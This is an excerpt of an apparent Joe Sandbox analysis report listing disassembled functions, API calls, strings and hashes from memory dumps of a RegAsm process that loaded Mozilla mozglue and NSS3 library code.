Associated: 00000004.00000002.2413572139.000000006CEA0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413587501.000000006CEA5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6ccc0000_RegAsm.jbxd

Similarity

API ID: CriticalSectionUnlockValue$AllocateArenaEnterLeave
String ID: KRAM
API String ID: 4127063985-3815160215
Opcode ID: 1c01cf283a960621d032eb54bc7bcb2cf82bcba147c979c87faf1b9b998af060
Instruction ID: 710f39fc764575902f9b4a0b2b4dac2804f424dc091fb14e41b6361f8db07fe7
Opcode Fuzzy Hash: 1c01cf283a960621d032eb54bc7bcb2cf82bcba147c979c87faf1b9b998af060
Instruction Fuzzy Hash: 29218DB1A156018FDB00AF78C884569FBF4FF45304F45896ED888CB721EB35D89ACB92

Uniqueness

Uniqueness Score: -1.00%

Function 6CC0F5B0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 70threadCOMMON

Download Yara Rule

APIs

Part of subcall function 6CBFCBE8: GetCurrentProcess.KERNEL32(?,6CBC31A7), ref: 6CBFCBF1
Part of subcall function 6CBFCBE8: TerminateProcess.KERNEL32(00000000,00000003,?,6CBC31A7), ref: 6CBFCBFA

Part of subcall function 6CC09420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6CBD4A68), ref: 6CC0945E
Part of subcall function 6CC09420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6CC09470
Part of subcall function 6CC09420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6CC09482
Part of subcall function 6CC09420: __Init_thread_footer.LIBCMT ref: 6CC0949F

GetCurrentThreadId.KERNEL32 ref: 6CC0F619
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,00000000,?,6CC0F598), ref: 6CC0F621

Part of subcall function 6CC094D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6CC094EE
Part of subcall function 6CC094D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6CC09508

GetCurrentThreadId.KERNEL32 ref: 6CC0F637
AcquireSRWLockExclusive.KERNEL32(6CC4F4B8,?,?,00000000,?,6CC0F598), ref: 6CC0F645
ReleaseSRWLockExclusive.KERNEL32(6CC4F4B8,?,?,00000000,?,6CC0F598), ref: 6CC0F663

Strings

[D %d/%d] profiler_remove_sampled_counter(%s), xrefs: 6CC0F62A

Memory Dump Source

Source File: 00000004.00000002.2412300207.000000006CBC1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CBC0000, based on PE: true

Associated: 00000004.00000002.2412272729.000000006CBC0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.2412533246.000000006CC3D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.2412586168.000000006CC4E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.2412609993.000000006CC52000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6cbc0000_RegAsm.jbxd

Similarity

API ID: Currentgetenv$ExclusiveLockProcessThread$AcquireInit_thread_footerReleaseTerminate__acrt_iob_func__stdio_common_vfprintf_getpid
String ID: [D %d/%d] profiler_remove_sampled_counter(%s)
API String ID: 1579816589-753366533
Opcode ID: f7d88d299d8f255dd12dafc369aa7a06425ea7d3cdd7e1a912cc4bd21bc6a1ee
Instruction ID: 709e5f289e3b95ecf04db9463619a32e8629086401a306bf6459b60c53dc4b92
Opcode Fuzzy Hash: f7d88d299d8f255dd12dafc369aa7a06425ea7d3cdd7e1a912cc4bd21bc6a1ee
Instruction Fuzzy Hash: 51112375300604AFCA00BF59C818EA9B779FB8636CF10C015EA0583F01EB32A811CBB4

Uniqueness

Uniqueness Score: -1.00%

Function 6CE52C80 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 61stringCOMMON

Download Yara Rule

APIs

PR_EnterMonitor.NSS3 ref: 6CE52CA0
PR_ExitMonitor.NSS3 ref: 6CE52CBE
calloc.MOZGLUE(00000001,00000014), ref: 6CE52CD1
strdup.MOZGLUE(?), ref: 6CE52CE1
PR_LogPrint.NSS3(Loaded library %s (static lib),00000000), ref: 6CE52D27

Strings

Loaded library %s (static lib), xrefs: 6CE52D22

Memory Dump Source

Source File: 00000004.00000002.2412659173.000000006CCC1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CCC0000, based on PE: true

Associated: 00000004.00000002.2412639409.000000006CCC0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413390971.000000006CE5F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413523450.000000006CE9E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413549858.000000006CE9F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413572139.000000006CEA0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413587501.000000006CEA5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6ccc0000_RegAsm.jbxd

Similarity

API ID: Monitor$EnterExitPrintcallocstrdup
String ID: Loaded library %s (static lib)
API String ID: 3511436785-2186981405
Opcode ID: c19e2c97478c5be61cb861e1a314ceecd7b78923794cf5e6b28378e77ea7bad4
Instruction ID: aefcf25e43eadf6ba68a2884d7fab4999b3832a09dd95483297c82f0edb0699c
Opcode Fuzzy Hash: c19e2c97478c5be61cb861e1a314ceecd7b78923794cf5e6b28378e77ea7bad4
Instruction Fuzzy Hash: 9F11E2B1701210DFEB008F95E844A6A77B4AB9635DFA4802DD809C7B51E732E828CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 6CBD1FA0 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 60libraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 6CBFAB89: EnterCriticalSection.KERNEL32(6CC4E370,?,?,?,6CBC34DE,6CC4F6CC,?,?,?,?,?,?,?,6CBC3284), ref: 6CBFAB94
Part of subcall function 6CBFAB89: LeaveCriticalSection.KERNEL32(6CC4E370,?,6CBC34DE,6CC4F6CC,?,?,?,?,?,?,?,6CBC3284,?,?,6CBE56F6), ref: 6CBFABD1

LoadLibraryW.KERNEL32(combase.dll,?), ref: 6CBD1FDE
GetProcAddress.KERNEL32(00000000,CoCreateInstance), ref: 6CBD1FFD
__Init_thread_footer.LIBCMT ref: 6CBD2011
FreeLibrary.KERNEL32 ref: 6CBD2059

Strings

CoCreateInstance, xrefs: 6CBD1FF7
combase.dll, xrefs: 6CBD1FD9

Memory Dump Source

Source File: 00000004.00000002.2412300207.000000006CBC1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CBC0000, based on PE: true

Associated: 00000004.00000002.2412272729.000000006CBC0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.2412533246.000000006CC3D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.2412586168.000000006CC4E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.2412609993.000000006CC52000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6cbc0000_RegAsm.jbxd

Similarity

API ID: CriticalLibrarySection$AddressEnterFreeInit_thread_footerLeaveLoadProc
String ID: CoCreateInstance$combase.dll
API String ID: 4190559335-2197658831
Opcode ID: d25c1dea7072f524f95ca223dbd7a993a1dbcbcd222b85ed9ad08948461b07c9
Instruction ID: 2d25fa8d8ea2d996fa9dc2d16d78e6aea1b1fbae131ed2d3ffa1742ab2422cfa
Opcode Fuzzy Hash: d25c1dea7072f524f95ca223dbd7a993a1dbcbcd222b85ed9ad08948461b07c9
Instruction Fuzzy Hash: DC118B75200285AFEF20EF55C85CE9A7B79EB8A35DF01C029F91492740D731A811EFA2

Uniqueness

Uniqueness Score: -1.00%

Function 6CDA0FF0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 54COMMON

Download Yara Rule

APIs

calloc.MOZGLUE(00000001,00000024,00000000,?,?,6CD487ED,00000800,6CD3EF74,00000000), ref: 6CDA1000
PR_NewLock.NSS3(?,00000800,6CD3EF74,00000000), ref: 6CDA1016

Part of subcall function 6CE098D0: calloc.MOZGLUE(00000001,00000084,6CD30936,00000001,?,6CD3102C), ref: 6CE098E5

PL_InitArenaPool.NSS3(00000000,security,6CD487ED,00000008,?,00000800,6CD3EF74,00000000), ref: 6CDA102B
TlsGetValue.KERNEL32(00000000,?,?,6CD487ED,00000800,6CD3EF74,00000000), ref: 6CDA1044
free.MOZGLUE(00000000,?,00000800,6CD3EF74,00000000), ref: 6CDA1064

Strings

security, xrefs: 6CDA1025

Memory Dump Source

Source File: 00000004.00000002.2412659173.000000006CCC1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CCC0000, based on PE: true

Associated: 00000004.00000002.2412639409.000000006CCC0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413390971.000000006CE5F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413523450.000000006CE9E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413549858.000000006CE9F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413572139.000000006CEA0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413587501.000000006CEA5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6ccc0000_RegAsm.jbxd

Similarity

API ID: calloc$ArenaInitLockPoolValuefree
String ID: security
API String ID: 3379159031-3315324353
Opcode ID: 26fea8ab95464e3ee8a02b18dcaf33f8f29e995f7f727732a8ef678b062d634c
Instruction ID: 59354cbc63f6d2d1b15933631537daa6863bf7525a35199bc81076b217547835
Opcode Fuzzy Hash: 26fea8ab95464e3ee8a02b18dcaf33f8f29e995f7f727732a8ef678b062d634c
Instruction Fuzzy Hash: 19014831B00250DBE7203FBEDC096467A78BF03799F010116E858D7A71EB64D116DBEA

Uniqueness

Uniqueness Score: -1.00%

Function 6CBD0EE0 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 51libraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 6CBFAB89: EnterCriticalSection.KERNEL32(6CC4E370,?,?,?,6CBC34DE,6CC4F6CC,?,?,?,?,?,?,?,6CBC3284), ref: 6CBFAB94
Part of subcall function 6CBFAB89: LeaveCriticalSection.KERNEL32(6CC4E370,?,6CBC34DE,6CC4F6CC,?,?,?,?,?,?,?,6CBC3284,?,?,6CBE56F6), ref: 6CBFABD1

LoadLibraryW.KERNEL32(combase.dll,00000000,?,6CBFD9F0,00000000), ref: 6CBD0F1D
GetProcAddress.KERNEL32(00000000,CoInitializeEx), ref: 6CBD0F3C
__Init_thread_footer.LIBCMT ref: 6CBD0F50
FreeLibrary.KERNEL32(?,6CBFD9F0,00000000), ref: 6CBD0F86

Strings

combase.dll, xrefs: 6CBD0F18
CoInitializeEx, xrefs: 6CBD0F36

Memory Dump Source

Source File: 00000004.00000002.2412300207.000000006CBC1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CBC0000, based on PE: true

Associated: 00000004.00000002.2412272729.000000006CBC0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.2412533246.000000006CC3D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.2412586168.000000006CC4E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.2412609993.000000006CC52000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6cbc0000_RegAsm.jbxd

Similarity

API ID: CriticalLibrarySection$AddressEnterFreeInit_thread_footerLeaveLoadProc
String ID: CoInitializeEx$combase.dll
API String ID: 4190559335-2063391169
Opcode ID: 40307d7cc0cae749b1a2584e101cb4efd76f1f9206ae1ec96e031eac590192de
Instruction ID: 09d52a3ed880a4d9bb59bf9600ba451d8da24e0fab8e10d92542cb774a1bff13
Opcode Fuzzy Hash: 40307d7cc0cae749b1a2584e101cb4efd76f1f9206ae1ec96e031eac590192de
Instruction Fuzzy Hash: E511E5743052819FDF00EF58D918E4A7B74FB8B32EF12C629E90592741E730A405CE53

Uniqueness

Uniqueness Score: -1.00%

Function 6CC0F540 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 36threadCOMMON

Download Yara Rule

APIs

Part of subcall function 6CC09420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6CBD4A68), ref: 6CC0945E
Part of subcall function 6CC09420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6CC09470
Part of subcall function 6CC09420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6CC09482
Part of subcall function 6CC09420: __Init_thread_footer.LIBCMT ref: 6CC0949F

GetCurrentThreadId.KERNEL32 ref: 6CC0F559
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6CC0F561

Part of subcall function 6CC094D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6CC094EE
Part of subcall function 6CC094D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6CC09508

GetCurrentThreadId.KERNEL32 ref: 6CC0F577
AcquireSRWLockExclusive.KERNEL32(6CC4F4B8), ref: 6CC0F585
ReleaseSRWLockExclusive.KERNEL32(6CC4F4B8), ref: 6CC0F5A3

Strings

[I %d/%d] profiler_resume_sampling, xrefs: 6CC0F499
[I %d/%d] profiler_resume, xrefs: 6CC0F239
[I %d/%d] profiler_pause_sampling, xrefs: 6CC0F3A8
[D %d/%d] profiler_add_sampled_counter(%s), xrefs: 6CC0F56A

Memory Dump Source

Source File: 00000004.00000002.2412300207.000000006CBC1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CBC0000, based on PE: true

Associated: 00000004.00000002.2412272729.000000006CBC0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.2412533246.000000006CC3D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.2412586168.000000006CC4E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.2412609993.000000006CC52000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6cbc0000_RegAsm.jbxd

Similarity

API ID: getenv$CurrentExclusiveLockThread$AcquireInit_thread_footerRelease__acrt_iob_func__stdio_common_vfprintf_getpid
String ID: [D %d/%d] profiler_add_sampled_counter(%s)$[I %d/%d] profiler_pause_sampling$[I %d/%d] profiler_resume$[I %d/%d] profiler_resume_sampling
API String ID: 2848912005-2840072211
Opcode ID: 066d927c9f5a8f8be621c9c6ef39defe927b2f7b24053e04248213c7c2b3a31d
Instruction ID: bf8d253709ff637408ea135aeda3fc9aef40846c72cc732097db350a7b423747
Opcode Fuzzy Hash: 066d927c9f5a8f8be621c9c6ef39defe927b2f7b24053e04248213c7c2b3a31d
Instruction Fuzzy Hash: 90F054757006049FEA007B659858E5E7B7DEBC62ADF00C055FA0583B01EF7688058775

Uniqueness

Uniqueness Score: -1.00%

Function 6CC0F600 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 36threadCOMMON

Download Yara Rule

APIs

Part of subcall function 6CC09420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6CBD4A68), ref: 6CC0945E
Part of subcall function 6CC09420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6CC09470
Part of subcall function 6CC09420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6CC09482
Part of subcall function 6CC09420: __Init_thread_footer.LIBCMT ref: 6CC0949F

GetCurrentThreadId.KERNEL32 ref: 6CC0F619
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,00000000,?,6CC0F598), ref: 6CC0F621

Part of subcall function 6CC094D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6CC094EE
Part of subcall function 6CC094D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6CC09508

GetCurrentThreadId.KERNEL32 ref: 6CC0F637
AcquireSRWLockExclusive.KERNEL32(6CC4F4B8,?,?,00000000,?,6CC0F598), ref: 6CC0F645
ReleaseSRWLockExclusive.KERNEL32(6CC4F4B8,?,?,00000000,?,6CC0F598), ref: 6CC0F663

Strings

[D %d/%d] profiler_remove_sampled_counter(%s), xrefs: 6CC0F62A

Memory Dump Source

Source File: 00000004.00000002.2412300207.000000006CBC1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CBC0000, based on PE: true

Associated: 00000004.00000002.2412272729.000000006CBC0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.2412533246.000000006CC3D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.2412586168.000000006CC4E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.2412609993.000000006CC52000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6cbc0000_RegAsm.jbxd

Similarity

API ID: getenv$CurrentExclusiveLockThread$AcquireInit_thread_footerRelease__acrt_iob_func__stdio_common_vfprintf_getpid
String ID: [D %d/%d] profiler_remove_sampled_counter(%s)
API String ID: 2848912005-753366533
Opcode ID: 37cc048d0a3f48f3b4a9e11d0c2926f58e707d7236dd2850a18a0e60d118fe5f
Instruction ID: bed89b82f752680626fc62020b6a97fcd39642248b3477c56174dee0245ecf8e
Opcode Fuzzy Hash: 37cc048d0a3f48f3b4a9e11d0c2926f58e707d7236dd2850a18a0e60d118fe5f
Instruction Fuzzy Hash: 7CF05EB5300604AFEA007B659858E5EBB7DEBC62ADF00C065FA0583B41EB7688058775

Uniqueness

Uniqueness Score: -1.00%

Function 6CBD0E40 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 36libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(kernel32.dll,6CBD0DF8), ref: 6CBD0E82
GetProcAddress.KERNEL32(00000000,GetProcessMitigationPolicy), ref: 6CBD0EA1
__Init_thread_footer.LIBCMT ref: 6CBD0EB5
FreeLibrary.KERNEL32 ref: 6CBD0EC5

Strings

GetProcessMitigationPolicy, xrefs: 6CBD0E9B
kernel32.dll, xrefs: 6CBD0E7D

Memory Dump Source

Source File: 00000004.00000002.2412300207.000000006CBC1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CBC0000, based on PE: true

Associated: 00000004.00000002.2412272729.000000006CBC0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.2412533246.000000006CC3D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.2412586168.000000006CC4E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.2412609993.000000006CC52000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6cbc0000_RegAsm.jbxd

Similarity

API ID: Library$AddressFreeInit_thread_footerLoadProc
String ID: GetProcessMitigationPolicy$kernel32.dll
API String ID: 391052410-1680159014
Opcode ID: 0bdc69a5834387471b3a7f572aaff7a52ddcd235726b8dff0760cc6c55140f4c
Instruction ID: e7051d3ff08be9f2ccd008fad55cf5edf49c01077de6b30b9dbd9146c94b80ef
Opcode Fuzzy Hash: 0bdc69a5834387471b3a7f572aaff7a52ddcd235726b8dff0760cc6c55140f4c
Instruction Fuzzy Hash: 82014B74B003C28FEF02AFE8E814A4A77B5E74632DF11E925D91182F40E738B4058A12

Uniqueness

Uniqueness Score: -1.00%

Function 6CC005F0 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 31stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0(<jemalloc>,?,?,?,?,6CBFCFAE,?,?,?,6CBC31A7), ref: 6CC005FB
_write.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,<jemalloc>,00000000,6CBFCFAE,?,?,?,6CBC31A7), ref: 6CC00616
strlen.API-MS-WIN-CRT-STRING-L1-1-0(: (malloc) Error in VirtualFree(),?,?,?,?,?,?,?,6CBC31A7), ref: 6CC0061C
_write.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,: (malloc) Error in VirtualFree(),00000000,?,?,?,?,?,?,?,?,6CBC31A7), ref: 6CC00627

Strings

<jemalloc>, xrefs: 6CC005FA, 6CC0060F
: (malloc) Error in VirtualFree(), xrefs: 6CC0061B, 6CC00625

Memory Dump Source

Source File: 00000004.00000002.2412300207.000000006CBC1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CBC0000, based on PE: true

Associated: 00000004.00000002.2412272729.000000006CBC0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.2412533246.000000006CC3D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.2412586168.000000006CC4E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.2412609993.000000006CC52000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6cbc0000_RegAsm.jbxd

Similarity

API ID: _writestrlen
String ID: : (malloc) Error in VirtualFree()$<jemalloc>
API String ID: 2723441310-2186867486
Opcode ID: 807e80d559a28ed8f7c40b4a3af41e6b926c438172056f3ccb31b83d2398398d
Instruction ID: 71b727443edce2f7991d785871db14f9d526341dfc06f0a10680b2932b282ba8
Opcode Fuzzy Hash: 807e80d559a28ed8f7c40b4a3af41e6b926c438172056f3ccb31b83d2398398d
Instruction Fuzzy Hash: FCE08CE2A0202037F6142256BC86DFB761CDBC6138F080139FD0D86301F94AAD1A51F6

Uniqueness

Uniqueness Score: -1.00%

Function 6CDE2E50 Relevance: 9.3, APIs: 6, Instructions: 251COMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140(?,?,00000000), ref: 6CDE3046

Part of subcall function 6CDCEE50: PR_SetError.NSS3(FFFFE013,00000000), ref: 6CDCEE85

PK11_AEADOp.NSS3(?,00000004,?,?,?,?,?,00000000,?,B8830845,?,?,00000000,6CDB7FFB), ref: 6CDE312A
memcpy.VCRUNTIME140(00000000,?,?), ref: 6CDE3154
PR_SetError.NSS3(FFFFE001,00000000), ref: 6CDE2E8B

Part of subcall function 6CDEC2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6CDEC2BF

Part of subcall function 6CDCF110: PR_SetError.NSS3(FFFFE013,00000000,00000000,0000A48E,00000000,?,6CDB9BFF,?,00000000,00000000), ref: 6CDCF134

memcpy.VCRUNTIME140(8B3C75C0,?,6CDB7FFA), ref: 6CDE2EA4
PR_SetError.NSS3(FFFFE005,00000000), ref: 6CDE317B

Memory Dump Source

Source File: 00000004.00000002.2412659173.000000006CCC1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CCC0000, based on PE: true

Associated: 00000004.00000002.2412639409.000000006CCC0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413390971.000000006CE5F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413523450.000000006CE9E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413549858.000000006CE9F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413572139.000000006CEA0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413587501.000000006CEA5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6ccc0000_RegAsm.jbxd

Similarity

API ID: Error$memcpy$K11_Value
String ID:
API String ID: 2334702667-0
Opcode ID: b3f8841bb0fe36cbc8e018cad26682fcb9108b010c3d84fc52a78f23eaad3441
Instruction ID: f6bb53dc8b776ae8e15294ad3b4856b06c6e1f68c9d6d3c8d61e4daf5fe2f39e
Opcode Fuzzy Hash: b3f8841bb0fe36cbc8e018cad26682fcb9108b010c3d84fc52a78f23eaad3441
Instruction Fuzzy Hash: B4A1BE71A002199FDB24CF54CC80BEAB7B5EF49308F148199ED496B791E731AE85CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 6CDAED00 Relevance: 9.2, APIs: 6, Instructions: 228memoryCOMMON

Download Yara Rule

APIs

PORT_ArenaAlloc_Util.NSS3(?,00000000), ref: 6CDAED6B
PORT_Alloc_Util.NSS3(00000000), ref: 6CDAEDCE

Part of subcall function 6CDA0BE0: malloc.MOZGLUE(6CD98D2D,?,00000000,?), ref: 6CDA0BF8
Part of subcall function 6CDA0BE0: TlsGetValue.KERNEL32(6CD98D2D,?,00000000,?), ref: 6CDA0C15

free.MOZGLUE(00000000,?,?,?,?,6CDAB04F), ref: 6CDAEE46
PORT_ArenaAlloc_Util.NSS3(?,?), ref: 6CDAEECA
PORT_ArenaAlloc_Util.NSS3(?,0000000C), ref: 6CDAEEEA
PORT_ArenaAlloc_Util.NSS3(?,00000008), ref: 6CDAEEFB

Memory Dump Source

Source File: 00000004.00000002.2412659173.000000006CCC1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CCC0000, based on PE: true

Associated: 00000004.00000002.2412639409.000000006CCC0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413390971.000000006CE5F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413523450.000000006CE9E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413549858.000000006CE9F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413572139.000000006CEA0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413587501.000000006CEA5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6ccc0000_RegAsm.jbxd

Similarity

API ID: Alloc_Util$Arena$Valuefreemalloc
String ID:
API String ID: 3768380896-0
Opcode ID: b52333073ec389f5d78ac231616d7b266601427a449566a5b43a0cff95f12f10
Instruction ID: d344bef12d3a6e30624d385872418ea94f38b2c9959d3089ee23cd243c087036
Opcode Fuzzy Hash: b52333073ec389f5d78ac231616d7b266601427a449566a5b43a0cff95f12f10
Instruction Fuzzy Hash: 12815EB5A00205DFEB14CF99D884BAB77F5FF88308F144428E91597B61DB30E926CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 6CBD05F0 Relevance: 9.2, APIs: 6, Instructions: 226COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2412300207.000000006CBC1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CBC0000, based on PE: true

Associated: 00000004.00000002.2412272729.000000006CBC0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.2412533246.000000006CC3D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.2412586168.000000006CC4E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.2412609993.000000006CC52000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6cbc0000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 563a8b7b1ac1b7ed33c18a3ed63431e65c5b1dd70244d695e9b222afcbb30d55
Instruction ID: 1e319a692b07e586205a2b0da51dec65e365b1c0a42a9df2eba3c9408a3d318e
Opcode Fuzzy Hash: 563a8b7b1ac1b7ed33c18a3ed63431e65c5b1dd70244d695e9b222afcbb30d55
Instruction Fuzzy Hash: 24A159B0A006458FDB24CF29D594A9AFBF1FF49304F45866ED44A9BB01E730B989CF91

Uniqueness

Uniqueness Score: -1.00%

Function 6CC214A0 Relevance: 9.2, APIs: 6, Instructions: 176threadtimeCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 6CC214C5
?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6CC214E2
GetCurrentThreadId.KERNEL32 ref: 6CC21546
InitializeConditionVariable.KERNEL32(?), ref: 6CC215BA
free.MOZGLUE(?), ref: 6CC216B4

Memory Dump Source

Source File: 00000004.00000002.2412300207.000000006CBC1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CBC0000, based on PE: true

Associated: 00000004.00000002.2412272729.000000006CBC0000.00000002.00000001.01000000.0000000A.sdmpDownload File
